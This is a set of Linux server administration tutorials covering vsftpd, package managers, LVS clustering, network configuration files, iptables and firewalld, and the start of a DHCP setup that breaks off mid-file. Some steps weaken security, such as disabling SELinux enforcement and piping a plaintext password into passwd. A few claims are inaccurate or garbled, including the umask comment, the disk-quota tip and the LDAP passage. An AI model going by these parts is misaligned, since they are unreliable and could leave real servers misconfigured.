In case IPTables are configured on the system, it will be necessary to edit the iptables file and open the ports used by FTP to ensure the service's operation.

To open file /etc/sysconfig/iptables, enter:

# vi /etc/sysconfig/iptables

Add the following lines, ensuring that they appear before the final LOG and DROP lines for the RH-Firewall-1-INPUT:

-A RH-Firewall-1-INPUT -m state --state NEW -p tcp --dport 21 -j ACCEPT

Next, open file /etc/sysconfig/iptables-config, and enter:

# vi /etc/sysconfig/iptables-config

Ensure that the space-separated list of modules contains the FTP connection-tracking module:

IPTABLES_MODULES="ip_conntrack_ftp"

Save and close the file and finally restart the firewall using the following commands:

# systemctl restart iptables.service
# systemctl restart ip6tables.service

Tip: View FTP Log File

Type the following command:

# tail -f /var/log/vsftpd.log

Tip: Restricting Access to Anonymous User Only

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

local_enable=NO

Tip: To Disable FTP Uploads

Edit the vsftpd configuration file /etc/vsftpd/vsftpd.conf and add the following:

write_enable=NO

Tip: To Enable Disk Quota

Disk quota must be enabled to prevent users from filling a disk used by the FTP upload service. Edit the vsftpd configuration file and add or correct the following option, which specifies the directory vsftpd will try to change into after an anonymous login:

anon_root=/ftp/ftp/pub

The ftp users are the same users as those on the hosting machine.

You could have a separate group for ftp users, to help keep their privileges down (for example 'anonftpusers'). Knowing that, your script should do:

useradd -d /www/htdocs/hosted/bob -g anonftpusers -s /sbin/nologin bob
echo bobspassword | passwd --stdin bob
echo bob >> /etc/vsftpd/user_list

Be extremely careful with your scripts, as they will have to be run as root.

However, for this to work you will have to have the following options enabled in /etc/vsftpd/vsftpd.conf

userlist_enable=YES
userlist_deny=NO

Security Tip: Place The FTP Directory On Its Own Partition

Separating the operating system files from FTP users' files may result in a better and more secure system. Restricting the growth of certain file systems is possible using various techniques. For example, use a /ftp partition to store all FTP home directories and mount it with the nosuid, nodev and noexec options. A sample /etc/fstab entry:

/dev/sda5  /ftp  ext3  defaults,nosuid,nodev,noexec,usrquota 1 2
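With the usrquota mount option in place, the quota itself still has to be initialised and assigned. A minimal sketch of the usual steps, assuming the quota tools are installed and using the 'bob' account from the earlier example (the exact steps may vary slightly between distributions):

# mount -o remount /ftp
# quotacheck -cum /ftp
# edquota -u bob
# quotaon /ftp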

Example File For vsftpd.conf

Following is an example vsftpd.conf. It allows the users listed in the user_list file to log in, permits no anonymous users, and places quite tight restrictions on what users can do:

# Allow anonymous FTP?
anonymous_enable=NO
#
# Allow local users to log in?
local_enable=YES
#
# Allow any form of FTP write command.
write_enable=YES
#
# To make files uploaded by your users writable by only
# themselves, but readable by everyone and if, through some
# misconfiguration, an anonymous user manages to upload a file,
# the file will have no read, write or execute permission. Just to be
# safe.
local_umask=0000
file_open_mode=0644
anon_umask=0777
#
# Allow the anonymous FTP user to upload files?
anon_upload_enable=NO
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=NO
#
# Activate logging of uploads/downloads?
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data)?
connect_from_port_20=YES
#
# Log file in standard ftpd xferlog format?
xferlog_std_format=NO
#
# User for vsftpd to run as?
nopriv_user=vsftpd
#
# Login banner string:
ftpd_banner= NOTICE TO USERS - Use of this system constitutes consent to security monitoring and testing. All activity is logged with your host name and IP address.
#
# chroot local users (only allow users to see their directory)?
chroot_local_user=YES
#
# PAM service name?
pam_service_name=vsftpd
#
# Enable user_list (see next option)?
userlist_enable=YES
#
# Should the user_list file specify users to deny(=YES) or to allow(=NO)
userlist_deny=NO
#
# Standalone (not run through xinetd) listen mode?
listen=YES
#
#
tcp_wrappers=NO
#
# Log all ftp actions (not just transfers)?
log_ftp_protocol=YES
# Initially YES for trouble shooting, later change to NO
#
# Show file ownership as ftp:ftp instead of real users?
hide_ids=YES
#
# Allow ftp users to change permissions of files?
chmod_enable=NO
#
# Use local time?
use_localtime=YES
#
# List of raw FTP commands, which are allowed (some commands may be a security hazard):
cmds_allowed=ABOR,QUIT,LIST,PASV,RETR,CWD,STOR,TYPE,PWD,SIZE,NLST,PORT,SYST,PRET,MDTM,DELE,MKD,RMD

With this config, files uploaded by anonymous users would end up with no read, write or execute permissions, so for them the server acts as a 'dropbox'. Change the file_open_mode and umask options to change that.

Lastly, it is also advised to have a look at 'man vsftpd.conf' for a full list and description of all options.


Updating Your Linux Server - How to Update Linux Workstations and Operating Systems

Like any other software, an operating system needs to be updated. Updates are required not only because of the new hardware coming into the market, but also for improving the overall performance and taking care of security issues.

Updates are usually done in two distinct ways. One is called the incremental update, and the other is the major update. In incremental updates, components of the operating system undergo minor modifications. Users are usually notified of such modifications over the net and can download and install them serially using the update-management software.

However, some major modifications require so many changes, involving several packages simultaneously, that it becomes rather complicated to accomplish them serially over the net. This type of modification is best done through a fresh installation, after acquiring the improved version of the operating system.

Package management is one of the most distinctive features distinguishing major Linux distributions. Major projects offer a graphical user interface where users can select a package and install it with a mouse click. These programs are front-ends to the low-level utilities to manage the tasks associated with installing packages on a Linux system. Although many desktop Linux users feel comfortable installing packages through these GUI tools, the command-line package management offers two excellent features not available in any graphical package management utility, and that is power and speed.

The Linux world is sharply divided into three major groups, each swearing by the type of package management they use - the “RPM” group, the “DEB” group and the “Slackware” group. There are other fragment groups using different package management types, but they are insignificant in comparison. Among the three groups, RPM and DEB are by far the most popular, and several other groups have been derived from them. Some of the Linux distributions that handle these package managements are:

RPM - RedHat Enterprise/Fedora/CentOS/OpenSUSE/Mandriva, etc.

DEB - Debian/Ubuntu/Mint/Knoppix, etc.

RPM - RedHat Package Manager

Although RPM was originally used by RedHat, this package format is handled by different package management tools specific to each Linux distribution. While OpenSUSE uses the “zypp” package management utility, RedHat Enterprise Linux (RHEL), Fedora and CentOS use “yum”, and Mandriva and Mageia use “urpmi”.

Therefore, if you are an OpenSUSE user, you will use the following commands:

For updating your package list: zypper refresh

For upgrading your system: zypper update

For installing new software pkg: zypper install pkg (from package repository)

For installing new software pkg: zypper install pkg  (from package file)

For updating existing software pkg: zypper update -t package pkg

For removing unwanted software pkg: zypper remove pkg

For listing installed packages: zypper search -ls

For searching by file name: zypper wp file

For searching by pattern: zypper search -t pattern pattern

For searching by package name pkg: zypper search pkg

For listing repositories: zypper repos

For adding a repository: zypper addrepo pathname

For removing a repository: zypper removerepo name

 

If you are a Fedora or CentOS user, you will be using the following commands:

For updating your package list: yum check-update

For upgrading your system: yum update

For installing new software pkg: yum install pkg (from package repository)

For installing new software pkg: yum localinstall pkg (from package file)

For updating existing software pkg: yum update pkg

For removing unwanted software pkg: yum erase pkg

For listing installed packages: rpm -qa

For searching by file name: yum provides file

For searching by pattern: yum search pattern

For searching by package name pkg: yum list pkg

For listing repositories: yum repolist

For adding a repository: (add repo to /etc/yum.repos.d/)

For removing a repository: (remove repo from /etc/yum.repos.d/)

 

You may be a Mandriva or Mageia user, in which case, the commands you will use will be:

For updating your package list: urpmi update -a

For upgrading your system: urpmi --auto-select

For installing new software pkg: urpmi pkg (from package repository)

For installing new software pkg: urpmi pkg (from package file)

For updating existing software pkg: urpmi pkg

For removing unwanted software pkg: urpme pkg

For listing installed packages: rpm -qa

For searching by file name: urpmf file

For searching by pattern: urpmq --fuzzy pattern

For searching by package name pkg: urpmq pkg

For listing repositories: urpmq --list-media

For adding a repository: urpmi.addmedia name path

For removing a repository: urpmi.removemedia media

DEB - Debian Package Manager

Debian Package Manager was introduced by Debian and later adopted by all derivatives of Debian - Ubuntu, Mint, Knoppix, etc. This is a relatively simple and standardized set of tools, working across all the Debian derivatives. Therefore, if you use any of the distributions managed by the DEB package manager, you will be using the following commands:

For updating your package list: apt-get update

For upgrading your system: apt-get upgrade

For installing new software pkg: apt-get install pkg (from package repository)

For installing new software pkg: dpkg -i pkg (from package file)

For updating existing software pkg: apt-get install pkg

For removing unwanted software pkg: apt-get remove pkg

For listing installed package: dpkg -l

For searching by file name: apt-file search path

For searching by pattern: apt-cache search pattern

For searching by package name pkg: apt-cache search pkg

For listing repositories: cat /etc/apt/sources.list

For adding a repository: (edit /etc/apt/sources.list)

For removing a repository: (edit /etc/apt/sources.list)


Implementing Virtual Servers and Load Balancing Cluster System with Linux

What is Server Virtualization?

Server virtualization is the process of apportioning a physical server into several smaller virtual servers. During server virtualization, the resources of the server itself remain hidden. In fact, the resources are masked from users, and software is used for dividing the physical server into multiple virtual machines or environments, called virtual or private servers.

This technology is commonly used in Web servers. Virtual Web servers provide a very simple and popular way of offering low-cost web hosting services. Instead of using a separate computer for each server, dozens of virtual servers can co-exist on the same computer.

There are many benefits of server virtualization. For example, it allows each virtual server to run its own operating system. Each virtual server can be independently rebooted without disturbing the others. Because several servers run on the same hardware, less hardware is required for server virtualization, which saves a lot of money for the business. Since the process utilizes resources to the fullest, it saves on operational costs. Using a lower number of physical servers also reduces hardware maintenance.

In most cases, the customer does not observe any performance deficit and each web site behaves as if it is being served by a dedicated server. However, because the computer's resources are shared, if a large number of virtual servers reside on the same computer, or if one of the virtual servers starts to hog the resources, Web pages will be delivered more slowly.

There are several ways of creating virtual servers, with the most common being virtual machines, operating system-level virtualization, and paravirtual machines.

How Are Virtual Servers Helpful

With the way the Internet is exploding with information, it is playing an increasingly important role in our lives. Internet traffic is increasing dramatically, and has been growing at an annual rate of nearly 100%. The workload on the servers is increasing at the same time, so that servers frequently become overloaded for short durations, especially on popular web sites.

To overcome the overloading problem of the servers, there are two solutions. One is the single server solution, such as upgrading the server to a higher performance server. However, as requests increase, it will soon be overloaded again, so that it has to be upgraded repeatedly; the upgrading process is complex and the cost is high.

The other is the multiple server solution, such as building a scalable network service system on a cluster of servers. As load increases, you can just add a new server or several new servers into the cluster to meet the increasing requests, and a virtual server running on commodity hardware offers the lowest cost-to-performance ratio. Therefore, for network services, the virtual server is a highly scalable and more cost-effective way of building a server cluster system.

Virtual Servers with Linux

Highly available server solutions are done by clustering. Cluster computing involves three distinct branches, of which two are addressed by RHEL or Red Hat Enterprise Linux:

  • Load balancing clusters, using Linux Virtual Servers as specialized routing machines to dispatch traffic to a pool of servers.

  • Highly available or HA clustering with Red Hat Cluster Manager, which uses multiple machines to add an extra level of reliability for a group of services.

Load Balancing Cluster System Using RHEL Virtual Servers

When you access a website or a database application, you do not know if you are accessing a single server or a group of servers. To you, the Linux Virtual Server or LVS cluster appears as a single server. In reality, there is a cluster of two or more servers behind a pair of redundant LVS routers. These routers distribute the client requests evenly throughout the cluster system.

Administrators use Red Hat Enterprise Linux and commodity hardware to address availability requirements, and to create consistent and continuous access to all hosted services.

In its simplest form, an LVS cluster consists of two layers. In the first layer are two similarly configured cluster members, which are Linux machines. One of these machines is the LVS router and is configured to direct the requests from the internet to the servers. The LVS router balances the load on the real servers, which form the second layer. The real servers provide the critical services to the end-user. The second Linux machine acts as a monitor to the active router and assumes its role in the event of a failure.

The active router directs traffic from the Internet to the real servers by making use of Network Address Translation or NAT. The real servers are connected to a dedicated network segment and transfer all public traffic via the active LVS router. The outside world sees this entire cluster arrangement as a single entity.

LVS with NAT Routing

The active LVS router has two Network Interface Cards or NICs. One of the NICs is connected to the Internet and has a real IP address on the eth0 and a floating IP address aliased to eth0:1. The other NIC connects to the private network with a real IP address on the eth1, and a floating address aliased to eth1:1.

All the servers of the cluster are located on the private network and use the floating IP of the NAT router. They communicate with the active LVS router via the floating IP as their default route. This ensures their ability to respond to requests from the Internet is not impaired.

When requests are received by the active LVS router, it routes the request to an appropriate server. The real server processes the request and returns the packets to the LVS router. Using NAT, the LVS router then replaces the address of the real server in the packets with the public IP address of the LVS router. This process is called IP Masquerading, and it hides the IP addresses of the real servers from the requesting clients.

Configuring LVS Routers with the Piranha Configuration Tool

The configuration file for an LVS cluster follows strict formatting rules. To prevent server failures because of syntax errors in the file lvs.cf, using the Piranha Configuration Tool is highly recommended. This tool provides a structured approach to creating the necessary configuration file for a Piranha cluster. The configuration file is located at /etc/sysconfig/ha/lvs.cf, and the configuration can be done with a web-based tool such as the Apache HTTP Server.

As an example, we will use the following settings:

LVS Router 1: eth0: 192.168.26.201

LVS Router 2: eth0: 192.168.26.202

Real Server 1: eth0: 192.168.26.211

Real Server 2: eth0: 192.168.26.212

VIP: 192.168.26.200

Gateway: 192.168.26.1

You will need to install piranha and ipvsadm packages on the LVS Routers:

# yum install ipvsadm

# yum install piranha

Start services on the LVS Routers with:

# chkconfig pulse on

# chkconfig piranha-gui on

# chkconfig httpd on

Set a password for the Piranha Configuration Tool using the following command:

# piranha-passwd

Next, turn on Packet Forwarding on the LVS Routers with:

# echo 1 > /proc/sys/net/ipv4/ip_forward
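The echo command above only lasts until the next reboot. To make packet forwarding persistent, a common approach (a sketch, assuming the classic sysctl configuration file is used) is:

# echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
# sysctl -p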

Starting the Piranha Configuration Tool Service

First you'll need to put SELinux into permissive mode and start the web services, using the following commands:

# setenforce 0

# service httpd start

# service piranha-gui start

If this is not done, the system will most probably show the following error message when the piranha-gui service is started:

Starting piranha-gui: (13)Permission denied: make_sock: could not bind to address [::]:3636

(13)Permission denied: make_sock: could not bind to address 0.0.0.0:3636
No listening sockets available, shutting down
Unable to open logs

Configure the LVS Routers with the Piranha Configuration Tool

The Piranha Configuration Tool runs on port 3636 by default. Open http://localhost:3636 or http://192.168.26.201:3636 in a Web browser to access the Piranha Configuration Tool. Click on the Login button and enter piranha as the Username and, in the Password field, the administrative password you created:

linux-virtual-servers-1

Click on the GLOBAL SETTINGS panel, enter the primary server public IP, and click the ACCEPT button:

linux-virtual-servers-2

 Click on the REDUNDANCY panel, enter the redundant server public IP, and click the ACCEPT button:

linux-virtual-servers-3

 Click on the VIRTUAL SERVERS panel, add a server, edit it, and activate it:

linux-virtual-servers-4

linux-virtual-servers-5

Clicking on the REAL SERVER subsection link at the top of the panel displays the EDIT REAL SERVER subsection. Click the ADD button to add new servers, edit them and activate them:

linux-virtual-servers-6

Copy the lvs.cf file to another LVS router:

# scp /etc/sysconfig/ha/lvs.cf root@192.168.26.202:/etc/sysconfig/ha/lvs.cf

Start the pulse services on the LVS Routers with the following command:

# service pulse restart

Testing the System

You can use the Apache HTTP server benchmarking tool (ab) to simulate a visit by the user.
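For example, a quick benchmark against the cluster's virtual IP (the VIP from the settings above) could look like the following; the request and concurrency counts are arbitrary:

# ab -n 1000 -c 10 http://192.168.26.200/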

HA Clustering With Red Hat Cluster Manager

When dealing with clusters, single points of failure and unresponsive applications or nodes are some of the issues that reduce the availability of the servers. Red Hat addresses these issues through their High Availability or HA Add-On servers. Centralised configuration and management are some of the best features of the Conga application of RHEL.

For delivering an extremely mature, high-performing, secure and lightweight high-availability server solution, RHEL implements the Totem Single Ring Ordering and Membership Protocol. Corosync is the cluster executive within the HA Add-On.

Kernel-based Virtual Machine Technology

RHEL uses the Linux kernel that has the virtualization characteristics built-in and makes use of the kernel-based virtual machine technology known as KVM. This makes RHEL perfectly suitable to run as either a host or a guest in any Enterprise Linux deployment. As a result, all Red Hat Enterprise Linux system management and security tools and certifications are part of the kernel and always available to the administrators, out of the box.

RHEL uses highly improved SCSI-3 PR reservations-based fencing. Fencing is the process of cutting a cluster node off from shared resources when it has lost contact with the cluster. This prevents uncoordinated modification of shared storage, thus protecting the resources.

Improvement in system flexibility and configuration is possible because RHEL allows manual specification of devices and keys for reservation and registration. Ordinarily, after fencing, the disconnected cluster node would need to be rebooted to rejoin the cluster. RHEL unfencing makes it possible to re-enable access and start up the node without administrative intervention.

Improved Cluster Configuration

LDAP, the Lightweight Directory Access Protocol, provides an improved cluster configuration system for load options. This provides better manageability and usability across the cluster by easily configuring, validating and synchronizing the reload. Virtualized KVM guests can be run as managed services.

RHEL's Web interface for cluster management and administration runs on TurboGears2 and provides a rich graphical user interface. This enables unified logging and debugging: administrators can enable, capture and read cluster system logs using a single cluster configuration command.

Installing TurboGears2

The method of installing TurboGears2 depends on the platform and the level of experience. It is recommended to install TurboGears2 within a virtual environment, as this will prevent interference with the system's installed packages. Prerequisites for installation of TurboGears2 are Python, Setuptools, Database and Drivers, Virtualenv, Virtualenvwrapper and other dependencies.
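A minimal sketch of such a virtual environment installation, assuming virtualenv and pip are already available (the exact package names may vary with the TurboGears2 release):

$ virtualenv tg2env
$ source tg2env/bin/activate
(tg2env)$ pip install TurboGears2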

linux-virtual-servers-7


Working with Linux TCP/IP Network Configuration Files

This article covers the main TCP/IP network configuration files used by Linux to configure various network services of the system, such as the IP address, default gateway, name servers (DNS), hostname and much more. Any Linux administrator must be well aware of where these services are configured and how to use them. The good news is that most of the information provided in this article applies to Redhat Fedora, Enterprise Linux, CentOS, Ubuntu and other similar Linux distributions.

On most Linux systems, you can access the TCP/IP connection details within 'X Windows' from Applications > Others > Network Connections. The same may also be reached through Application > System Settings > Network > Configure. This opens up a window, which offers configuration of IP parameters for wired, wireless, mobile broadband, VPN and DSL connections:

linux-tcpip-config-1

The values entered here modify the files:

           /etc/sysconfig/network-scripts/ifcfg-eth0

           /etc/sysconfig/networking/devices/ifcfg-eth0

           /etc/resolv.conf

           /etc/hosts

The static host IP assignment is saved in /etc/hosts

The DNS server assignments are saved in the /etc/resolv.conf

IP assignments for all the devices found on the system are saved in the ifcfg-<interface> files mentioned above.

If you want to see all the IP assignments, you can run the command for interface configuration:

# ifconfig

Following is the output of the above command:

[root@gateway ~]# ifconfig

eth0    Link encap:Ethernet  HWaddr 00:0C:29:AB:21:3E
          inet addr:192.168.1.18  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:feab:213e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1550249 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1401847 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:167592321 (159.8 MiB)  TX bytes:140584392 (134.0 MiB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback 
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:71833 errors:0 dropped:0 overruns:0 frame:0
          TX packets:71833 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:12205495 (11.6 MiB)  TX bytes:12205495 (11.6 MiB)

The command ifconfig is used to configure a network interface. It can be used to set up the interface parameters that are used at boot time. If no arguments are given, the command ifconfig displays the status of the currently active interfaces. If you want to see the status of all interfaces, including those that are currently down, you can use the argument -a, as shown below:

# ifconfig -a

Fedora, Redhat Enterprise Linux, CentOS and other similar distributions support user profiles as well, with different network settings for each user. The user profile and its parameters are set by the network-configuration tools. The relevant system files are placed in:

/etc/sysconfig/networking/profiles/profilename/

After boot-up, to switch to a specific profile you have to access a graphical tool, which will allow you to select from among the available profiles. You will have to run:

$ system-config-network

Or for activating the profile from the command line -

$ system-config-network-cmd -p <profilename> --activate

The Basic Commands for Networking

The basic commands used in Linux are common to every distro:

ifconfig - Configures and displays the IP parameters of a network interface

route - Used to set static routes and view the routing table

hostname - Necessary for viewing and setting the hostname of the system

netstat - Flexible command for viewing information about network statistics, current connections, listening ports

arp - Shows and manages the arp table

mii-tool - Used to set the interface parameters at data link layer (half/full duplex, interface speed, autonegotiation, etc.)

Many distros now also include the iproute2 tools, with enhanced routing and networking capabilities:

ip - Multi-purpose command for viewing and setting TCP/IP parameters and routes.

tc - Traffic control command, used  for classifying, prioritizing, sharing, and limiting both inbound and outbound traffic.

Types of Network Interface

LO (local loopback interface): the local loopback interface is recognized only internally to the computer; its IP address is usually 127.0.0.1 or 127.0.0.2.

Ethernet cards are used to connect to the world external to the computer, usually named eth0, eth1, eth2 and so on.

Network interface files holding the configuration of LO and ethernet are:

           /etc/sysconfig/network-scripts/ifcfg-lo

           /etc/sysconfig/network-scripts/ifcfg-eth0

To see the contents of the files use the command:

# less /etc/sysconfig/network-scripts/ifcfg-lo

Which results in:

DEVICE=lo
IPADDR=127.0.0.1
NETMASK=255.0.0.0
NETWORK=127.0.0.0
# If you're having problems with gated making 127.0.0.0/8 a martian,
# you can change this to something else (255.255.255.255, for example)
BROADCAST=127.255.255.255
ONBOOT=yes
NAME=loopback

And the following:

# less /etc/sysconfig/network-scripts/ifcfg-eth0

Which gives the following results:

DEVICE="eth0"
NM_CONTROLLED="yes"
ONBOOT=yes
HWADDR=00:0C:29:52:A3:DB
TYPE=Ethernet
BOOTPROTO=none
IPADDR=192.168.1.18
PREFIX=24
GATEWAY=192.168.1.11
DNS1=8.8.8.8
DEFROUTE=yes
IPV4_FAILURE_FATAL=yes
IPV6INIT=no
NAME="System eth0"
UUID=5fb06bd0-0bb0-7ffb-45f1-d6edd65f3e03

 

Start and Stop the Network Interface Card

The ifconfig command can be used to start and stop network interface cards:

# ifconfig eth0 up
# ifconfig eth0 down

The ifup & ifdown command can also be used to start and stop network interface cards:

# ifup eth0
# ifdown eth0

The systemctl commands can also be used to enable, start, stop, restart and check the status of the network interface services -

# systemctl enable network.service
# systemctl start network.service
# systemctl stop network.service
# systemctl restart network.service
# systemctl status network.service

Displaying & Changing your System's Hostname

The command hostname displays the current hostname of the computer, which is 'Gateway':

# hostname
Gateway

You can change the hostname by giving the new name at the end of the command -

# hostname Firewall-cx

This will change to the new hostname once you have logged out and logged in again. In fact, for any change to the interfaces, the change is implemented only the next time the user logs in after a log-out.
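Note that the hostname command alone does not survive a reboot on these distributions. To make the change permanent, the HOSTNAME variable in /etc/sysconfig/network is usually edited as well, for example:

# vi /etc/sysconfig/network
HOSTNAME=Firewall-cx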

This concludes our Linux Network Configuration article.




Configuring Linux to Act as a Firewall - Linux IPTables Basics

What exactly is a firewall? As in the non-computer world, a firewall acts as a physical barrier to prevent fires from spreading. In the computer world too, the firewall acts in a similar manner, only the fires that they prevent from spreading are the attacks, which crackers generate when the computer is on the Internet. Therefore, a firewall can also be called a packet filter, which sits between the computer and the Internet, controlling and regulating the information flow.

Most of the firewalls in use today are the filtering firewalls. They sit between the computer and the Internet and limit access to only specific computers on the network. It can also be programmed to limit the type of communication, and selectively permit or deny several Internet services.

Organizations receive their routable IP addresses from their ISPs. However, the number of IP addresses given is limited. Therefore, alternate ways of sharing the Internet services have to be found without every node on the LAN getting a public IP address. This is done commonly by using private IP addresses, so that all nodes are able to access properly both external and internal network services.

Firewalls are used for receiving incoming transmissions from the Internet and routing the packets to the intended nodes on the LAN. Similarly, firewalls are also used for routing outgoing requests from a node on the LAN to the remote Internet service.

This method of forwarding the network traffic may prove to be dangerous, as modern cracking tools can spoof the internal IP addresses and allow the remote attacker to act as a node on the LAN. In order to prevent this, iptables provides routing and forwarding policies, which can be implemented to prevent abnormal usage of networking resources. For example, the FORWARD chain lets the administrator control where the packets are routed within a LAN.

LAN nodes can communicate with each other, and they can accept the forwarded packets from the  firewall, with their internal IP addresses. However, this does not give them the facility to communicate to the external world and to the Internet.

For allowing the LAN nodes that have private IP addresses to communicate with the outside world, the firewall has to be configured for IP masquerading. The requests that LAN nodes make, are then masked with the IP addresses of the firewall’s external device, such as eth0.

How IPtables Can Be Used To Configure Your Firewall

Whenever a packet arrives at the firewall, it is either processed or disregarded. The disregarded packets are normally those that are malformed or technically invalid in some way. Depending on the activity required, the processed packets are handled by one of the three built-in 'tables'. The first table is the mangle table, which alters the quality-of-service bits in the packet header. The second table is the filter table, which takes care of the actual filtering of the packets. It consists of three chains, and you can place your firewall policy rules in these chains (shown in the diagram below):

- Forward chain: It filters the packets to be forwarded to networks protected by the firewall.

- Input chain: It filters the packets arriving at the firewall.

- Output chain: It filters the packets leaving the firewall.

The third table is the NAT table. This is where the Network Address Translation or NAT is performed. There are two built-in chains in this:

- Pre-routing chain: It NATs the packets whose destination address needs to be changed.

- Post-routing chain: It NATs the packets whose source address needs to be changed.

Whenever a rule is set, the table it belongs to has to be specified. The 'filter' table is the only exception, because most iptables rules are filter rules; therefore, the filter table is the default table.

The diagram below shows the flow of packets within the filter table. Packets entering the Linux system follow a specific logical path and decisions are made based on their characteristics. The path shown below is independent of the network interface they enter or exit:

The Filter Queue Table

linux-ip-filter-table

Each of the chains filters data packets based on:

  • Source and Destination IP Address
  • Source and Destination Port number
  • Network interface (eth0, eth1 etc)
  • State of the packet 

Target for the rule: ACCEPT, DROP, REJECT, QUEUE, RETURN and LOG

As mentioned previously, the table of NAT rules consists mainly of two chains: each rule is examined in order until one matches. The two chains are called PREROUTING (for Destination NAT, as packets first come in), and POSTROUTING (for Source NAT, as packets leave).

The NAT Table

linux-nat-table

At each of the points above, when a packet passes we look up what connection it is associated with. If it's a new connection, we look up the corresponding chain in the NAT table to see what to do with it. The answer it gives will apply to all future packets on that connection.

The most important option here is the table selection option, `-t'. For all NAT operations, you will want to use `-t nat' for the NAT table. The second most important option to use is `-A' to append a new rule at the end of the chain (e.g. `-A POSTROUTING'), or `-I' to insert one at the beginning (e.g. `-I PREROUTING').

The following command enables NAT for all outgoing packets. Eth0 is our WAN interface:

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

 If you rather implement static NAT, mapping an internal host to a public IP, here's what the command would look like:

# iptables -A POSTROUTING -t nat -s 192.168.0.3 -o eth0 -d 0/0 -j SNAT --to 203.18.45.12

With the above command, all outgoing packets sent from internal IP 192.168.0.3 are mapped to external IP 203.18.45.12.

Taking it the other way around, the command below is used to enable port forwarding from the WAN interface, to an internal host. Any incoming packets on our external interface (eth0) with a destination port (dport) of 80, are forwarded to an internal host (192.168.0.5), port 80:

# iptables -t nat -A PREROUTING -p tcp -i eth0 --dport 80 -j DNAT --to 192.168.0.5:80

How The FORWARD Chain Allows Packet Forwarding

Packet forwarding within a LAN is controlled by the FORWARD chain in the iptables firewall. If the firewall has its internal IP address on eth2 and its external IP address on eth0, the rules that allow forwarding for the entire LAN would be:

# iptables -A FORWARD -i eth2 -j ACCEPT
# iptables -A FORWARD -o eth0 -j ACCEPT

This way, the firewall forwards traffic for the LAN nodes that have internal IP addresses. The packets enter through the eth2 device of the gateway and are then routed on to their intended destination nodes.
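Keep in mind that rules added with the iptables command live only in memory. On RHEL-based systems they are commonly made persistent with the stock init script (a sketch, assuming the traditional iptables service is in use), which writes the running rules to /etc/sysconfig/iptables:

# service iptables save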

Dynamic Firewall

By default, the IPv4 policy in Fedora kernels disables support for IP forwarding. This prevents machines that run Fedora from functioning as a dedicated firewall. Furthermore, starting with Fedora 16, the default firewall solution is now provided by “firewalld”. Although it is claimed to be the default, Fedora 16 still ships with the traditional firewall iptables. To enable the dynamic firewall in Fedora, you will need to disable the traditional firewall and install the new dynamic firewalld. The main difference between the two is firewalld is smarter in the sense it does not have to be stopped and restarted each time a policy decision is changed, unlike the traditional firewall.

To disable the traditional firewall, there are two methods, graphical and command line. For the graphical method, the system-config-firewall GUI can be opened from the Applications menu > Other > Firewall. The firewall can then be disabled.

For the command line, the following commands will be needed:

# systemctl stop iptables.service
# systemctl stop ip6tables.service

To remove iptables entirely from system:

# systemctl disable iptables.service

rm '/etc/systemd/system/basic.target.wants/iptables.service'

# systemctl disable ip6tables.service

rm '/etc/systemd/system/basic.target.wants/ip6tables.service'

For installing Firewalld, you can use Yum:

# yum install firewalld firewall-applet

To enable and then start Firewalld you will need the following commands:

# systemctl enable firewalld.service
# systemctl start firewalld.service

The firewall-applet can be started from Applications menu > Other > Firewall Applet

When you hover the mouse over the firewall applet on the top panel, you can see the ports, services, etc. that are enabled. By clicking on the applet, the different services can be started or stopped. However, if you change the status and the applet crashes, then in order to regain control you will have to kill the applet using the following commands:

# ps -A | grep firewall*

Which will tell you the PID of the running applet, and you can kill it with the following command:

# kill -9 <pid>

A restart of the applet can be done from the Applications menu, and now the service you had enabled will be visible.

To get around this, the command line option can be used:

Use firewall-cmd to enable, for example ssh: 

# firewall-cmd --enable --service=ssh

Enable samba for 10 seconds:

# firewall-cmd --enable --service=samba --timeout=10

Enable ipp-client:

# firewall-cmd --enable --service=ipp-client

Disable ipp-client:

# firewall-cmd --disable --service=ipp-client

To restore the static firewall with lokkit again simply use (after stopping and disabling Firewalld):

# lokkit --enabled


Installation and Configuration of Linux DHCP Server

For a cable modem or a DSL connection, the service provider dynamically assigns the IP address to your PC. When you install a DSL or a home cable router between your home network and your modem, your PC will get its IP address from the home router during boot up. A Linux system can be set up as a DHCP server and used in place of the router.

DHCP is not installed by default on your Linux system. To install it, you first have to gain root privileges:

$ su -

You will be prompted for the root password and you can install DHCP by the command:

# yum install dhcp

Once all the dependencies are satisfied, the installation will complete.

Start the DHCP Server

You will need root privileges for enabling, starting, stopping or restarting the dhcpd service:

# systemctl enable dhcpd.service

Once enabled, the dhcpd services can be started, stopped and restarted with:

# systemctl start dhcpd.service
# systemctl stop dhcpd.service
# systemctl restart dhcpd.service

or with the use of the following commands if systemctl command is not available:

# service dhcpd start
# service dhcpd stop
# service dhcpd restart

To determine whether dhcpd is running on your system, you can seek its status:

# systemctl status dhcpd.service

Another way of knowing if dhcpd is running is to use the 'service' command:

# service dhcpd status

Note that dhcpd has to be configured to start automatically on next reboot.

Configuring the Linux DHCP Server

Depending on the version of the Linux installation you are currently running, the configuration file may reside either in /etc/dhcpd or /etc/dhcpd3 directories.

When you install the DHCP package, a skeleton configuration file and a sample configuration file are created. Both are quite extensive, and the skeleton configuration file has most of its commands deactivated with # at the beginning. The sample configuration file can be found in the location /usr/share/doc/dhcp*/dhcpd.conf.sample.

When the dhcpd.conf file is created, a subnet section is generated for each of the interfaces present on your Linux system; this is very important. Following is a small part of the dhcpd.conf file:

ddns-update-style interim
ignore client-updates

subnet 192.168.1.0 netmask 255.255.255.0 {

   # The range of IP addresses the server
   # will issue to DHCP enabled PC clients
   # booting up on the network
   range 192.168.1.201 192.168.1.220;

   # Set the amount of time in seconds that
   # a client may keep the IP address
   default-lease-time 86400;
   max-lease-time 86400;

